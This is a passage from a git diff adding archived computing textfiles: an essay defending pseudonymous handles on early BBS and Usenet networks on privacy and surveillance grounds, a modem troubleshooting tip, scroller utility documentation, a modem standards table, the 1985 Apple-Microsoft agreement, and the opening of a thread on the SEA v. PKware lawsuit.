plastic explosive in his high-school chem lab. He +seemed kind of mad. + +But you're an upstanding citizen; you have nothing to hide. +So why not use your name on the nets? Trust me. There's +nothing to worry about. + +Is there? + + * * * * * + + WHAT'S ALL THIS BROUHAHA? + ------------------------- + + Stupidity is evil waiting to happen. [Clay Bond] + + +Not long ago in Fidonet's BCSNET echo (the Boston Computer +Society's national conference), the following was posted by +the conference moderator to a user calling himself "Captain +Kirk": + + "May we ask dear Captain Kirk that it would be very + polite if you could use your real name in an echomail + conference? This particular message area is shared + with BBS's all across the country and everyone else is + using their real name. It is only common courtesy to + do so in an echomail conference." + +One of us (mkj) responded with a post questioning that +policy. Soon the conference had erupted into a heated +debate! Although mkj had worried that the subject might be +dismissed as trivial, it apparently touched a nerve. It +brought forth debate over issues and perceptions central to +computer communications in general, and it revealed profound +disparities in fundamental values and assumptions among +participants. + +This article is a response to that debate, and to the +prevailing negative attitudes regarding the use of handles. +Handles seem to have a bad reputation. Their use is +strangely unpopular, and frequently forbidden by network +authorities. Many people seem to feel that handles are rude +or dishonest, or that anyone wishing to conceal his or her +identity must be up to no good. It is the primary purpose +of this article to dispel such prejudices. + +Let us make one thing perfectly clear here at the outset: We +do NOT challenge the need or the right of sysops to know the +identities of their users! But we do believe that a sysop +who collects user names has a serious responsibility to +protect that information. This means making sure that no +one has access to the data without a legal warrant, and it +certainly means not pressuring users to broadcast their real +names in widespread public forums such as conferences. + + * * * * * + + SO YOU WANT TO BE A STAR? + ------------------------- + + John Lennon died for our sins. [anonymous] + + +Andy Warhol said that "In the future, everyone will be +famous for fifteen minutes". The computer nets, more than +any other medium, lend credibility to this prediction. A +network conference may span the globe more completely than +even satellite TV, yet be open to anyone who can afford the +simplest computer and modem. Through our participation in +conferencing, each of us becomes, if only briefly, a public +figure of sorts -- often without realizing it, and without +any contemplation of the implications and possible +consequences. + +Brian Reid (reid@decwrl.DEC.COM) conducts and distributes +periodic surveys of Usenet conference readership. His +statistical results for the end of 1991 show that of the +1,459 conferences which currently make up Usenet, more than +fifty percent have over 20,000 readers apiece; the most +popular conferences are each seen by about 200,000 readers! +Mr. Reid's estimate of total Usenet readership is nearly TWO +MILLION people. + +Note that Mr. Reid's numbers are for Usenet only; they do +not include any information on other large public nets such +as RIME (PC-Relaynet), Fido, or dozens of others, nor do +they take into account thousands of private networks which +may have indirect public network connections. The total +number of users with access to public networks is unknown, +but informed estimates range to the tens of millions, and +the number keeps growing at an amazing pace -- in fact, the +rate of growth of this medium may be greater than any other +communications medium in history. + +The special problems and risks which arise when one deals +with a large public audience are something about which most +computer users have little or no experience or +understanding. Until recently, those of us involved in +computer conferencing have comprised a small and rather +elite community. The explosion in network participation is +catching us all a little unprepared. + +Among media professionals and celebrities, on the other +hand, the risks of conducting one's business in front of a +public audience are all too familiar. If the size of one's +audience becomes sufficiently large, one must assume that +examples of virtually every personality type will be +included: police and other agents of various governments, +terrorists, murderers, rapists, religious fanatics, the +mentally ill, robbers and con artists, et al ad infinitum. +It must also be assumed that almost anything you do, no +matter how innocuous, could inspire at least one person, +somewhere, to harbor ill will toward you. + +The near-fatal stabbing of actress Theresa Saldana is a case +in point. As she was walking to her car one morning near her +West Hollywood apartment, a voice behind her asked, "Are you +Theresa Saldana?"; when she turned to answer, a man she had +never seen before pulled out a kitchen knife and stabbed her +repeatedly. + +After her lengthy and painful recovery, she wrote a book on +the experience ("Beyond Survival", 1986). In that book she +wrote: + + + [pg 12] "... Detective Kalas informed me that the + assailant, whom he described as a Scottish drifter, had + fixated upon me after seeing me in films." + + [pg 28] "... it was through my work as an actress that + the attacker had fixated on me. Naturally, this made + me consider getting out of show business ..." + + [pg 34] "For security, I adopted an alias and became + 'Alicia Michaels.' ... during the months that followed + I grew so accustomed to it that, to this day, I still + answer reflexively when someone calls the name Alicia!" + +Or consider the fate of Denver radio talk show host Alan +Berg, who in 1984 died outside his home in a hail of +gunfire. Police believe he was the victim of a local neo- +nazi group who didn't like his politics. + +We are reminded of the murders of John Lennon and Rebecca +Shaffer; the Reagan/Hinckley/Foster incident; and a long +string of other "celebrity attacks" of all sorts, including +such bizarre events as the occupation of David Letterman's +home by a strange woman who claimed to be his wife! There is +probably no one in public life who doesn't receive at least +the occassional threatening letter. + +Of course, ordinary participants in network conferencing may +never attract quite the attention that other types of +celebrities attract. But consider the following, rather less +apocalyptic scenarios: + + -- On Friday night you post a message to a public + conference defending an unpopular or controversial + viewpoint. On Monday morning your biggest client + cancels a major contract. Or you are kept up all + night by repeated telephone calls from someone + demanding that you "stop killing babies"! + + -- You buy your teenage son or daughter a computer and + modem. Sometime later you find your lawn littered + with beer bottles and dug up with tire marks, or + your home vandalized or burglarized. + + -- One day you are nominated to the Supreme Court. Who + are all these strange people on TV claiming to be + your friends? How did that fellow know your position + on abortion? Your taste in GIFs? + +Celebrities and other professional media personalities +accept the risks and sacrifices of notoriety, along with the +benefits, as part of their chosen careers. Should computer +conference participants be expected to do the same? And who +should be making these decisions? + + * * * * * + + OTHER MEDIA + ----------- + + When thou art at Rome, do as they do at Rome [Cervantes] + + +Older media seem to address the problems of privacy very +differently than computer media, at least so far. We are +not aware of ANY medium or publication, apart from computer +conferencing, where amateur or even most professional +participants are required to expose their true names against +their will. Even celebrities frequently use "stage names", +and protect their addresses and phone numbers as best they +can. + +When a medium caters specifically to the general public, +participants are typically given even greater opportunities +to protect their privacy. Television talk shows have been +known to go so far as to employ silhouetting and electronic +alteration of voices to protect the identities of guests, +and audience members who participate are certainly not +required to state their full names before speaking. + +The traditional medium most analogous to computer +conferencing may be talk radio. Like conferencing, talk +radio is a group discussion and debate medium oriented +toward controversy, where emotions can run high. Programs +often center around a specific topic, and are always run by +a "host" whose role seems analogous in many respects to that +of a conference moderator. It is therefore worth noting +that in talk radio generally, policy seems to be that +callers are identified on the air only by their first names +(unless of course they volunteer more). + +Finally, of course, authors have published under "pen names" +since the dawn of publishing, and newspapers and magazines +frequently publish letters to the editor with "name and +address withheld by request" as the signature line. Even +founding fathers Alexander Hamilton, James Madison and John +Jay, in authoring the seminal Federalist Papers in 1787 for +publication in the Letters columns of various New York City +newspapers, concealed their identities behind the now-famous +psuedonym "Publius". + +What would you think if someone called a radio talk show +demanding to know the identity of a previous caller? Such a +demand would undoubtedly be seen as menacing and +inappropriate in that context. Yet that same demand seems +to arise without much challenge each time a handle shows up +in a computer conference. The authors of this article feel +that such demands should always be looked upon as +suspicious, and that it would be beneficial for moderators +to take upon themselves the responsibility of making sure +that besieged handle-users are aware of their right to +refuse such inappropriate demands. + +It is reasonable to assume that privacy policies in +traditional media are the result of hard-won wisdom gained +from long experience. Are we so arrogant that we cannot +learn from others? It is not hard to imagine the sorts of +problems and experiences which shaped these policies in the +old media. Will we have to wait for similar problems to +occur on the computer networks before we learn? + + * * * * * + + PRIVACY AND SURVEILLANCE + ------------------------ + + In an effort to identify people who fail to file tax + returns, the Internal Revenue Service is matching + its files against available lists of names and + addresses of U.S. citizens who have purchased + computers for home use. The IRS continues to seek + out sources for such information. This information + is matched against the IRS master file of taxpayers + to see if those who have not filed can be + identified. + [COMPUTERWORLD, Sept. 1985] + + Date: Thu, 23 May 91 11:58:07 PDT + From: mmm@cup.portal.com + Subject: The RISKS of Posting to the Net + - + I just had an interesting visit from the FBI. It + seems that a posting I made to sci.space several + months ago had filtered through channels, caused the + FBI to open (or re-open) a file on me, and an agent + wanted to interview me, which I did voluntarily... + I then went on to tell him about the controversy + over Uunet, and their role in supplying archives of + Usenet traffic on tape to the FBI... + [RISKS Digest] + + Also frequent are instances where computers are + seized incident to an unrelated arrest. For + example, on February 28, 1991, following an arrest + on charges of rape and battery, the Massachusetts + state and local police seized the suspect's computer + equipment. The suspect reportedly operated a 650- + subscriber bulletin board called "BEN," which is + described as "geared largely to a gay/leather/S&M + crowd." It is not clear what the board's seizure is + supposed to have accomplished, but the board is now + shut down, and the identities and messages of its + users are in the hands of the police. + [CONSTITUTIONAL, LEGAL, AND ETHICAL + CONSIDERATIONS FOR DEALING WITH ELECTRONIC + FILES IN THE AGE OF CYBERSPACE, Harvey A. + Silverglate and Thomas C. Viles] + + +Most of us have been brought up to be grateful for the fact +that we live in a nation where freedom is sacred. In other +countries, we are told as children, people are afraid to +speak their minds for fear they are being watched. Thank +God we live in America! + +It would surprise most of us to learn that America is +currently among the premiere surveillance nations in the +world, but such, sadly, is indeed the case. Our leadership +in technology has helped the U.S. government to amass as +much information on its citizens as almost any other nation +in history, totalitarian or otherwise. And to make matters +worse, a consumer surveillance behemoth has sprung up +consisting of huge private data-collection agencies which +cater to business. + +As Evan Hendricks, editor of "Privacy Times" (a Washington +D.C.-based newsletter) has put it: "You go through life +dropping bits and pieces of information about yourself +everywhere. Most people don't realize there are big vacuum +cleaners out there sucking it all up." [Wall Street +Journal, March 14, 1991]. + +To get an idea of how much of your privacy has already been +lost, consider the bits and pieces of information about +yourself which are already available to investigators, and +how thoroughly someone might come to know you by these clues +alone. + +A person's lifestyle and personality are largely described, +for example, by his or her purchases and expenses; from your +checking account records -- which banks are required by law +to keep and make available to government investigators -- a +substantial portrait of your life will emerge. Credit card +records may reveal much of the same information, and can +also be used to track your movements. (In a recent case, +"missing" Massachusetts State Representative Timothy O'Leary +was tracked by credit-card transactions as he fled across +the country, and his movements were reported on the nightly +news!) + +Then there are your school records, which include IQ and +other test results, comments on your "socialization" by +teachers and others, and may reveal family finances in great +detail. Employment and tax records reveal your present +income, as well as personal comments by employers and co- +workers. Your properties are another public record of your +income and lifestyle, and possibly your social status as +well. Telephone billing records reveal your personal and +business associations in more detail. Insurance records +reveal personal and family health histories and treatments. + +All of this information is commonly accessed by government +and private or corporate investigators. And this list is +far from exhaustive! + +Now consider how easily the computer networks lend +themselves to even further erosions of personal privacy. The +actual contents of our mail and telephone traffic have up to +now been subjected to deliberate scrutiny only under +extraordinary conditions. This built-in safety is due +primarily to the difficulty and expense of conducting +surveillance in these media, which usually requires extended +human intervention. But in the medium of computer +communications, most surveillance can be conducted using +automated monitoring techniques. Tools currently available +make it possible and even cost-effective for government and +other interests to monitor virtually everything which +happens here. + +Why would anyone want to monitor network users? It is well +documented that, throughout the 1960s and 1970s, the FBI and +other agencies of government, in operations such as the +infamous COINTELPRO among others, spent a great deal of time +and effort collecting vast lists of names. As Computer +Underground Digest moderators Jim Thomas and Gordon Meyer +recalled in a recent commentary (CuD #3.42): + + "A 1977 class action suit against the Michigan State + Police learned, through FOIA requests, that state and + federal agents would peruse letters to the editor of + newspapers and collect clippings of those whose politics + they did not like. These news clippings became the basis + of files on those persons that found there way into the + hands of other agencies and employers." + +To get onto one of these government "enemies" lists, you +often needed to do nothing more than telephone an +organization under surveillance, or subscribe to the "wrong" +types of magazines and newspapers. Groups engaged in +political activism, including environmental and women's +rights organizations, were commonly infiltrated. The sort +of investigative reporting which uncovered these lists and +surveillances back in the '60s and '70s is now rare, but +there is little reason to assume that such activities have +ceased or even slowed. In fact, progressive computerization +of local police LEIU activities (Law Enforcement +Intelligence Units, commonly known as "red squads") suggests +that such activities may have greatly increased. + +Within the realm of computer conferencing especially, there +is ample reason to believe that systematic monitoring is +being conducted by government and law-enforcement +organizations, and perhaps by other hostile interests as +well. In a recent issue of Telecom Digest +(comp.dcom.telecom), Craig Neidorf (knight@EFF.ORG) reported +on the results of a recent Freedom of Information Act +request for documents from the Secret Service: + + " ... The documents also show that the Secret Service + established a computer database to keep track of + suspected computer hackers. This database contains + records of names, aliases, addresses, phone numbers, + known associates, a list of activities, and various + [conference postings] associated with each individual." + +But the privacy issues which surround computer +communications go far beyond the collection of user lists. +Both government and industry have long pursued the elusive +grail of personality profiling on citizens and consumers. Up +to now, such ambitions have been restrained by the practical +difficulty and expense of collecting and analyzing large +amounts of information on large numbers of citizens. But +computer communications, more than any other technology, +seems to hold out the promise that this unholy grail may +finally be in sight. + +To coin a phrase, never has so much been known by so few +about so many. The information commonly available to +government and industry investi-gators today is sufficient +to make reliable predictions about our personalities, +health, politics, future behavior, our vulnerabilities, +perhaps even about our innermost thoughts and feelings. The +privacy we all take for granted is, in fact, largely an +illusion; it no longer exists in most walks of life. If we +wish to preserve even the most basic minimum of personal +privacy, it seems clear that we need to take far better care +on the networks than we have taken elsewhere. + + * * * * * + + FREEDOM + ------- + + Human beings are the only species with a history. + Whether they also have a future is not so obvious. + The answer will lie in the prospects for popular + movements, with firm roots among all sectors of the + population, dedicated to values that are suppressed + or driven to the margins within the existing social + and political order... + [Noam Chomsky] + + +In your day-to-day social interactions, as you deal with +employers, clients, public officials, friends, acquaintances +and total strangers, how often do you feel you can really +speak freely? How comfortable are you discussing +controversial issues such as religion, taxes, politics, +racism, sexuality, abortion or AIDS, for example? Would you +consider it appropriate or wise to express an honest opinion +on such an issue to your boss, or a client? To your +neighbors? + +Most of us confine such candid discussions to certain +"trusted" social contexts, such as when we are among our +closest friends. But when you post to a network conference, +your boss, your clients, and your neighbors may very well +read what you post -- if they are not on the nets today, +they probably will be soon, as will nearly everyone. + +If we have to consider each post's possible impact on our +social and professional reputations, on our job security and +income, on our family's acceptance and safety in the +community, it could be reckless indeed to express ourselves +freely on the nets. Yet conferences are often geared to +controversy, and inhibitions on the free expression of +opinions can reduce traffic to a trickle, killing off an +important conference topic or distorting a valuable sampling +of public opinion. + +More important still is the role computer networks are +beginning to play in the free and open dissemination of news +and information. Democracy is crippled if dissent and +diversity in the media are compromised; yet even here in the +U.S., where a "free press" is a cherished tradition, the +bulk of all the media is owned by a small (and ever- +shrinking) number of corporations, whose relatively narrow +culture, interests and perspec-tives largely shape the +public perception. + +Computer communication, on the other hand, is by its nature +very difficult to control or shape. Its resources are +scattered; when one BBS goes bust (or is busted!), three +others spring up in its place. The natural resiliency of +computer communications (and other new, decentral-ized +information technologies such as fax, consumer camcorders +and cheap satellite links) is giving rise to a new brand of +global "guerrilla journalism" which includes everyone, and +defies efforts at suppression. + +The power and value of this new journalistic freedom has +recently shown itself during the Gulf War, and throughout +Eastern Europe and the Soviet Union, as well as within the +U.S. Just think of the depth and detail of information +available on the nets regarding the Secret Service's recent +"Operation Sundevil" and associated activities, compared to +the grossly distorted, blatantly propagandistic coverage of +those same activities given to the general public through +the traditional media. + +Historically, established power and wealth have seldom been +disposed to tolerate uncontrolled media, and recent events +in this country and elsewhere show that computer media are +sometimes seen as threats to established interests as well. +To understand the role of handles in this context, it is +useful to note the flurries of anti-handle sentiment which +have arisen in the wake of crackdowns such as Sundevil, or +the Tom Tcimpidis raid in the early 1980s. Although few +charges and fewer convictions have typically resulted from +such operations, one might be tempted to speculate that the +real purposes -- to terrorize the nets and chill freedoms of +speech and assembly thereon -- have been achieved. + +In this way, sysops and moderators become unwitting +accomplices in the supression of freedom on the networks. +When real name requirements are instituted, anyone who fears +retaliation of any sort, by any group, will have to fear +participation in the nets; hence content is effectively +controlled. This consideration becomes especially important +as the nets expand into even more violent and repressive +countries outside the U.S. + +We must decide whether freedom of information and open +public discussion are in fact among the goals of network +conferencing, and if so, whether handles have a role in +achieving these goals. As access to the networks grows, we +have a rare opportunity to frustrate the efforts of +governments and corporations to control the public mind! In +this way above all others, computers may have the potential +to shape the future of all mankind for the better. + + * * * * * + + A CALL TO ACTION + ---------------- + + + The move to electronic communication may be a turning + point that history will remember. Just as in + seventeenth and eighteenth century Great Britain and + America a few tracts and acts set precedents for + print by which we live today, so what we think and do + today may frame the information system for a + substantial period in the future. + [Ithiel de Sola Pool, "Technologies of Freedom", 1983] + + +There was a time when anybody with some gear and a few +batteries could become a radio broadcaster -- no license +required. There was a time when anyone with a sense of +adventure could buy a plane, and maybe get a contract to +carry mail. Those early technological pioneers were +probably unable to imagine the world as it is today, but +their influence is strongly felt in current laws, +regulations and policies with roots in the traditions and +philosophies they founded and shaped. + +Today the new pioneers are knitting the world together with +computers, and the world is changing faster than ever. Law +and ethics are scrambling to keep up. How far will this +growth take us? No one can say for sure. But you don't +need a crystal ball to see that computer communications has +the potential to encompass and surpass all the functionality +of prior media -- print, post, telegraph, telephone, radio +and television -- and more. It seems reasonable to assume +that computer communications will be at least as ubiquitous +and important in the lives of our grandchildren as all the +older media have been in ours. + +It will be a world whose outlines we can now make out only +dimly. But the foundations of that world are being built +today by those of us exploring and homesteading on the +electronic frontier. We need to look hard at what it will +take to survive in the information age. + +In this article we have attempted to show, for one very +narrow issue, what some of the stakes may be in this future- +building game. But the risks associated with exposing your +name in a computer conference are not well defined, and +various people will no doubt assess the importance of these +risks differently. After all, most of us take risks every +day which are probably greater than the risks associated +with conferencing. We drive on the expressway. We eat +sushi. To some people, the risks of conferencing may seem +terrifying; to others, insignificant. + +But let us not get side-tracked into unresolvable arguments +on the matter. The real issue here is not how dangerous +conferencing may or may not be; it is whether you and I will +be able to make our own decisions, and protect ourselves (or +not) as we see fit. The obvious answer is that users must +exercise their collective power to advance their own +interests, and to pressure sysops and moderators to become +more sensitive to user concerns. + +To help in that effort, we would like to recommend the +following guidelines for user action: + + -- Bear in mind John Perry Barlow's observation that + "Liberties are preserved by using them". Let your + sysop know that you would prefer to be using a + handle, and use one wherever you can. + + -- Try to support boards and conferences which allow + handles, and avoid those which don't. + + -- When using a handle, BEHAVE RESPONSIBLY! There will + always be irresponsible users on the nets, and they + will always use handles. It is important for the + rest of us to fight common anti-handle prejudices by + showing that handles are NOT always the mark of an + irresponsible user! + + -- Educate others about the importance of handles (but + NEVER argue or flame anyone about it). + +To sysops and moderators: We ask you to bear in mind that +authority is often used best where it is used least. Grant +users the right to engage in any harmless and responsible +behaviors they choose. Protect your interests in ways which +tread as lightly as possible upon the interests of others. +The liberties you preserve may be your own! + +In building the computer forums of today, we are building +the social fabric of tomorrow. If we wish to preserve the +free and open atmosphere which has made computer networking +a powerful force, while at the same time taking care against +the risks inherent in such a force, handles seem to be a +remarkably harmless, entertaining and effective tool to help +us. Let's not throw that tool away. + +---------------------------------------------------------------------- +[end of excerpt] + + +-- +David Collier-Brown, | davecb@Nexus.YorkU.CA | lethe!dave +72 Abitibi Ave., | +Willowdale, Ontario, | He's so smart he's dumb. +CANADA. 416-223-8968 | -- Joyce Collier-Brown + +From caf-talk Caf Jun 10 00:17:10 1992 + diff --git a/textfiles.com/computers/antiarq.txt b/textfiles.com/computers/antiarq.txt new file mode 100644 index 00000000..709b5ca9 --- /dev/null +++ b/textfiles.com/computers/antiarq.txt @@ -0,0 +1,31 @@ +Do you know the terror of + + ARQ-FLASHING ? + +I am sure you know.... + +I have to admit that my method cant remove line-noise but the most +ARQ-Discos are not caused by a bad line but by a slow retrain of the HST. + +You start the upload and the first thing happening is: CS-led off and the +ARQ-led is flashing. (I know you cry "Yes, yes") Ok normaly it will take +a long time to finish flashing or it will never finish. What can I do +against this? Its pretty simple: Try to keep your computer away from +sending (just as long as the ARQ is flashing). +How can you do this? If you use NCOMM, you have just to click the Transmit- +Window (just as you want to move it). The border of the window will be +inverted. Hold this position until the disco is over. Repeat this if +the disco starts again. + +I know this is a very ify-english:-) + +Bye, + ____ ____ ______ + /_ __\ / __/ / ____/ + /\ /\//_// / / ___ / __/ + / \/ \ / / _// \//\/\/ /___ + /_/\__/\_\_\/_/ /__//_/\_\____/ + + +PS: If you use another Term and you cant find a way to stop the computer + from sending, leave me a msg (or an OLM:-) and I will code a short tool. diff --git a/textfiles.com/computers/anywhere.txt b/textfiles.com/computers/anywhere.txt new file mode 100644 index 00000000..ea5bf83b --- /dev/null +++ b/textfiles.com/computers/anywhere.txt @@ -0,0 +1,71 @@ + Anywhere Scroller + v1.00 + + +OverView: + + Anywhere scroller is a program that is another part to the +Intro Maker v3.0. This handy little utility, requires a .CRD coordinate +file for an external 256 color FONT picture. By using this program, you will +be allowed to draw with your keyboard or mouse, on the background picture +where and how you want the Scrolling text to appear. There are four parts +to this program. + The First part to this program, is the request for the .CRD file +which you have created, or one that has been provided with THG Intro Maker. +This will tell the program how big your font that you wish to scroll +actually is. The .CRD files can be created with the MEGAFONT.EXE program. + The Second part to the Anywhere Scroller is a feature that comes in +quite handy for tricky scrolling effects. After figuring how out big your +external font will be, the ANYWhere scroller will switch to 80x50 mode, and +display the number of pixels vertically. Here, the first pixel will be +a fixed point or reference point for the scroller. The next course of +action should be you using the keypad, or arrow keys to place each pixel +how you want it to scroll repectively to the first pixel. To switch +pixels, use the +/- keys. You can save these patterns in BWF files which +mean Brush Warping File. Use L and S to Load the Brush Warp File or Save +the Brush Warp File respectively. If you wish to move the 1st pixel so +you can move the pixels above or along side the first pixel, use the +I-J-K-M buttons to move the screen accordingly so you can have enough +room to move each pixel. Don't forget to save the BWF file if you wish +to re-use this pattern for another scroll. Press Q or ESC to exit +this part. It does not save this automatically, you must use the +Save command. + The Third part of the program, is a request for the background +picture support. Give the extension of your background picture according +to which graphics compression is used. It will decompact the picture and +display it throwing you into the next part of the program. + The heart of the Anywhere scroller is the next part. This will +show you a cursor that looks like you have entered according to the offsets +you have entered in the last second part of the program. Here, you may +either hit the Space Bar for PenUP/ PenDOWN toggle and the keypad for +moving the cursor around. Remember, when the Pen is DOWN, it is recording +where you are putting the pixels. That is the order they will show up in +when it goes to scroll it. You can also use the Mouse and Mouse buttons to +draw on the screen. Although, there is no mouse support when the keyboard +PenUP/PenDOWN key has been toggled, all you have to do is to place the +cursor where you want a slice of your scroll to go. Press the left mouse +button. The Right mouse button exits to the next part of the program, as +well does ESC, and Q. If you hold down the Left mouse button and move the +cursor, it will skip pixels. So go SLOWLY. THis is because the Mouse button +routine that was written is too fast for it. It would record several pixels +by just a quick press of the button. Also, the + and - keys change the +color of the cursor, and the backspace key undoes the previous slice. + The Final part to the program, is entering the Name of the .PTH +path file you wish to call it. This screen also tells you how many slices +of a scroller you have entered. + +Keys: + + +/- : Change Color + Q,ESC : Exit + Keypad : Move cursor + SpaceBar : PenUP/PenDOWN toggle + Back Space : Undo last Slice + Left Mouse Button : Place a slice at x,y + Right Mouse Button : Exit + + +Note: + I am not one for documentation. I don't think any of us are, but +this program is pretty easy to use. + \ No newline at end of file diff --git a/textfiles.com/computers/appendix.txt b/textfiles.com/computers/appendix.txt new file mode 100644 index 00000000..86840910 --- /dev/null +++ b/textfiles.com/computers/appendix.txt @@ -0,0 +1,63 @@ +APPENDIX A : Standards + +V.21 Standard for modem communications at 300 bps. Modems made in + the US or Canada follow the Bell 103 standard. However, the + modem can be set to answer V.21 calls from overseas. +V.22 Standard for modem communications at 1200 bps, compatible + with the Bell 212A standard observed in the US and Canada. +V.22 bis Standard for modem communications at 2400 bps. The standard + includes an automatic link negotiation fallback to 1200 bps + and compatibility with Bell 212A/V.22 modems. +V.23 Standard for modem communications at 1200 bps with a 75 bps + back channel. +V.24 Standards layed down by the CCITT for interfacing a digital + device to a PTT-supplied modem. V.24 is also used as an + interface standard for connecting a peripheral device, such + as a visual display unit or a printer, to a computer. +V.25 Standard for modem communications that specifies an answer + tone different from the Bell answer tone used in the US and + Cananda. +V.32 Standard for modem communications at 9600 bps and 4800 bps. + V.32 modems fall back at 4800 bps when line quality is + impaired, and fall forward again to 9600 bps when line + quality improves. +V.32 bis Standard that extends the V.32 connection range: 4800,7200, + 9600, 12K and 14.4K bps. V.32 bis modems fall back to the + next lower speed when line quality is impaired, and fall back + further as necessary. They fall forward to the next higher + speed when line quality improves. +V.34 28.800 CCITT standard +V.34+ 31.200 & 33.600, currently only supported by US Robotics + (V.EveryThing modems) under consideration by CCITT. +V.35 See V.24. +V.42 Standard for modem communications that defines a two-stage + process of detection and negotiation for LAPM error control. + V.42 also supports the MNP error control protocol. +V.42 bis An extention of V.42 that defines a specific data compression + scheme for use with V.42 and MNP error control. +X.3 It describes the functions of an X.25 PAD and the parameters + used to control its operation. +X.21 Interface between DTE and DCE for synchronous operation on + on public data networks. +X.25 Interface between DTE and DCE for terminals operating in + packet mode on public data networks. +X.28 It defines the interactions between a terminal and an X.25 + PAD. +X.29 It defines the interactions between a host and its associated + PAD. +X.75 ISDN, EuroStandard, 64000. +X.400 Message handling systems : System model and service elements. +X.401 Message handling systems : Basic service elements and + optional user facilities. +X.408 Message handling systems : Encoded information type + convertion rules. +X.409 Message handling systems : Presentation transfer syntax and + notation. +X.410 Message handling systems : Remote operations and reliable + transfer server. +X.411 Message handling systems : Message transfer layer. +X.420 Message handling systems : Interpersonal messaging user agent + layer. +X.430 Message handling systems : Access protocol for teletex + terminals. +X.500 The directory (OSI Directory Services). diff --git a/textfiles.com/computers/apple.txt b/textfiles.com/computers/apple.txt new file mode 100644 index 00000000..81942506 --- /dev/null +++ b/textfiles.com/computers/apple.txt @@ -0,0 +1,126 @@ + +TEXT OF APPLE-MICROSOFT AGREEMENT + + AGREEMENT + + This Agreement is entered into on this 22nd day of November, 1985, by +and between Apple Computer, Inc., a California corporation having its +place of business at 20525 Mariani Avenue, Cupertino, California 95014 +(hereinafter "Apple") and Microsoft Corporation, having its place of +business at 10700 Northrup Way, Bellevue, Washington 98008 (hereinafter +"Microsoft.") + The parties have a long history of cooperation and trust and wish to +maintain that mutually beneficial relationship. However, a dispute has +arisen concerning the ownership of and possible copyright infringement +as to certain visual displays generated by several Microsoft software +products. These products are Microsoft's operating environment program, +"Microsoft Windows Version 1.0," the three Microsoft applications +programs developed under the January 22, 1982, agreement between +Microsoft and Apple for use on Apple's MacIntosh Computers: an +electronic spread sheet program ("Microsoft Mutliplan"), a business +graphics program ("Microsoft Chart") and a database program (Microsoft +File"), and two other Microsoft application programs: an integrated +electronic spread sheet program ("Microsoft Excel") and a word +processing program ("Microsoft Word"). By means of this Agreement the +parties intend to resolve the dispute and each acknowledges that the +valuable consideration underlying this Agreement consists of the +resolution of the dispute and the several undertakings and +accommodations of the respective parties described below. Accordingly, +the parties agree as follows: + 1. Acknowledgement. For purposes of resolving this dispute and in +consideration of the license grant from Apple described in section 2 +below, Microsoft acknowledges that the visual displays in the +above-listed Microsoft programs are derivative works of the visual +displays generated by Apple's Lisa and Macintosh graphic user interface +programs. + 2. Visual Copyright License from Apple. + A. Grant. Apple hereby grants to Microsoft a non-exclusive, worldwide, +royalty-free, perpetual, non-transferable license to use these +derivative works in present and future software programs and to license +them to and through third parties for use in their software programs. + This license shall not include new software programs written by +Microsoft which are similar in function to Microsoft Excel and are +offered for to the public prior to October 1, 1986. + As a condition to this license, Microsoft shall cause its visual +copyright notice to appear in its products which use visual displays +licensed hereunder. + B. Warranty. Apple hereby warrants that neither Apple nor any of its +agents, representatives or attorneys knows of any patent, copyright, +trade secret or any other right or claim of or by any third party to +these licensed visual copyrights in the Lisa and Macintosh graphic user +interface programs. Each party shall notify the other promptly of any +such claim and will cooperate fully in the defense of such a claim. +Apple shall indemnify and hold Microsoft harmless from any such claim of +which it had such knowledge and any damages and reasonable expenses +arising therefrom. + 3. Patent License from Apple. + A. Grant. Apple hereby grants to Microsoft a nonexclusive, worldwide, +royalty-free, nontransferable license to make, use and sell the +.More.. +inventions described and claimed in claims 9, 11, 12, and 13 of the +United States Patent No. 4,464,652 for the life of the patent. Microsoft +in turn may license these rights to and through third parties for use in +their software programs and hardware products. Microsoft is not required +to cause any patent marking to appear in its products which use any such +inventions. + B. Warranty. Apple hereby warrants that it owns the patent and to the +best of its knowledge there are no claims asserted by any third party to +the inventions described in these claims. + 4. Release. Apple hereby waives any other copyright, patent, trade +secret or other claim or right it may have as to Microsoft Windows +Version 1.0. + 5. Visual Copyright License from Microsoft. Microsoft hereby grants to +Apple a nonexclusive, worldwide, royalty-free, perpetual, +nontransferable license to use any new visual displays created by +Microsoft during a period of five years from the date of this agreement +as part of its Microsoft Windows retail software product in software +programs and to license them to and through third parties for use in +their software programs. As a condition to this license, Apple shall +cause its visual copyright notice to appear in its products which use +.More.. +such Microsoft visual displays. + 6. Revision of Microsoft Word. Microsoft shall revise Microsoft Word +which operates on the Apple Macintosh computer by enhancing and +improving the program as specified in Exhibit A to this Agreement. +Microsoft shall use its best efforts to complete the revision by July +31, 1986. + 7. General Provisions. + A. Confidentiality. The parties shall keep the terms and conditions of +this Agreement in strict confidence, except that each party may state +that it has entered into an agreement with the other concerning visual +copyrights. + B. Representations. The parties represent that each is free to enter +into this Agreement and is not and will not become a party to any +agreement inconsistent or in conflic with any of the terms or +conditions of this agreement. + C. Breach and Termination. + If a breach of this Agreement by either party contines more than 30 +days from the date of written notice of such breach by the non-breaching +party, that party may terminate the Agreement by giving written notice +to the other. + Waiver by a non-breaching party of any breach by the other shall not +be deemed to be a waiver of any other or subsequent breach. The rights +of the parties under this clause are in addition to any other rights or +remedies provided by law or under this Agreement. + D. Notices. Any notice reuired under this Agreement shall be given by +first class mail, postage prepaid, with return receipt requested. + E. Assignment. Except in the case of the sale of substantially all of +the assets or controlling stock, this Agreement may not be assigned, nor +the rights granted hereunder (other than the sublicensing rights +containd in paragraph 2) transferred by either party without the prior +written consent of the other party. + F. Independent Contractor. This Agreement shall not be construed as +creating an agency, partnership or joint venture between the parties. + G. Entire Agreement. + This Agreement constitutes the entire agreement between the parties +with respect to the subject matter treated herein. This Agreement shall +not be amended except by a written agreement signed by both parties. + H. Binding Effect. + Subject to the limitations expressed above, this Agreement will inure +to the benefit of and be binding upon the parties and their successors +in interest. + Signed: + John Sculley, Apple Computer Inc., president and chief executive +officer. + William H. Gates, Microsoft Corporation, chairman of the board and +chief executive officer. diff --git a/textfiles.com/computers/arcsuit.txt b/textfiles.com/computers/arcsuit.txt new file mode 100644 index 00000000..305ee5fc --- /dev/null +++ b/textfiles.com/computers/arcsuit.txt @@ -0,0 +1,1109 @@ +==********** +Topic 9 Sat Jul 09, 1988 +HOMCHICK [Paul] at 21:20 EDT +Sub: SEA (ARC) sues PKware (PKARC)! + +SEA (Thom Hendersen) has filed suit againt Phil Katz and PKware, claiming the +PKARC infringes on ARC. This topic contains the full text of the complaint, +as well as several thoughtful commentaries. +16 message(s) total 